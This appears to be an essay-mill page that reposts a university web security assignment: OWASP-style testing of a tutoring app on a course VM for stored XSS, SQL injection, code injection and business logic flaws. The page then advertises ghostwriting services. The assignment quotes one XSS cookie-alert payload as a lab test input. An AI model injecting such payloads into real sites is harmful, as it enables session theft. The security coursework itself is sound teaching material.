MUST FOLLOW THE ATTACHED GRADING RUBRIC…..NO EXCUSES!
LET CHAT asap FOR MORE DETAILS.
Using the readings from weeks 7 and 8 as a baseline, analyze, test and document the results for the tutoring web application found on the SDEV virtual machine. Use both manual means and automated tools (e.g., ZAP). The latter will enable you to discover more information than a cursory manual examination. Specific tests to be conducted include:
2. Testing for Stored Cross site scripting (OTG-INPVAL-002)
What is the importance of testing for this vulnerability? What happens when you attempt to add a pop-up window (e.g., <script>alert(document.cookie)</script>) to the email input field within the “index.html” field? Can you introduce Stored Cross site scripting?
3. Testing for SQL Injection (OTG-INPVAL-005) Did your manual and automated testing discover any SQL Injection vulnerabilities – if so, how many? (Note: There should be at least one occurrence). Name two or more steps you can take according to the reading to resolve the issue. Fix and test at least one occurrence of the vulnerabilities – displaying your resulting source code and output results.
4. Testing for Code Injection (OTG-INPVAL-012) What is the importance of testing for this vulnerability? What are at least two measures you can take to remediate this issue? Can you input some simple html code or exploit Remote File Inclusion (RFI)?
5. Test business logic data validation (OTG-BUSLOGIC-001)
What are at least two examples of business logic errors? This could be from various input forms or areas you discovered in previous HW assignments. How can you mitigate against such errors?
6. Test integrity checks (OTG-BUSLOGIC-003) Do Drop down menus exist and are they sufficient for the application? Why does the use of drop-down menus help mitigate against this risk? Does your manual or automated scan reveal the use of password “AUTOCOMPLETE”? What issue, if any, does the use of AUTOCOMPLETE pose?
7. Test defenses against application misuse (OTG-BUSLOGIC-007)
What is the importance of testing for this vulnerability? Can adding additional characters in input fields cause unexpected results? Verify for at least two instances.
You should document the results for the tests, your comments, and recommendations for improved security for each security control tested in a word or PDF document. The format of your document should be the format that is recommended in chapter 5 of the OWASP testing guide. Provide screen captures and descriptions of your tests conducted. Discuss any issues found and possible mitigations.
Note: The SDEV Virtual Machine you downloaded and used for SDEV 300. The URL is here if you need to download it again: https://citeapps.umuc.edu/SDEV/ The VM runs on the latest version of Oracle Virtual Box. The directions to reinstall the Tutoring Web Application are also included in the course resources – which also includes any required passwords.
You should submit your document by the due date. Your document should be well-organized, use the OWASP recommended reporting format, include all references used and contain minimal spelling and grammar errors.
Essay Writing Service Features
Our ExperienceNo matter how complex your assignment is, we can find the right professional for your specific task. My Essay Gram is an essay writing company that hires only the smartest minds to help you with your projects. Our expertise allows us to provide students with high-quality academic writing, editing & proofreading services.
Free revision policy$10
Free bibliography & reference$8
Free title page$8
How Our Essay Writing Service Works
First, you will need to complete an order form. It's not difficult but, in case there is anything you find not to be clear, you may always call us so that we can guide you through it. On the order form, you will need to include some basic information concerning your order: subject, topic, number of pages, etc. We also encourage our clients to upload any relevant information or sources that will help.Complete the order form
Once we have all the information and instructions that we need, we select the most suitable writer for your assignment. While everything seems to be clear, the writer, who has complete knowledge of the subject, may need clarification from you. It is at that point that you would receive a call or email from us.Writer’s assignment
As soon as the writer has finished, it will be delivered both to the website and to your email address so that you will not miss it. If your deadline is close at hand, we will place a call to you to make sure that you receive the paper on time.Completing the order and download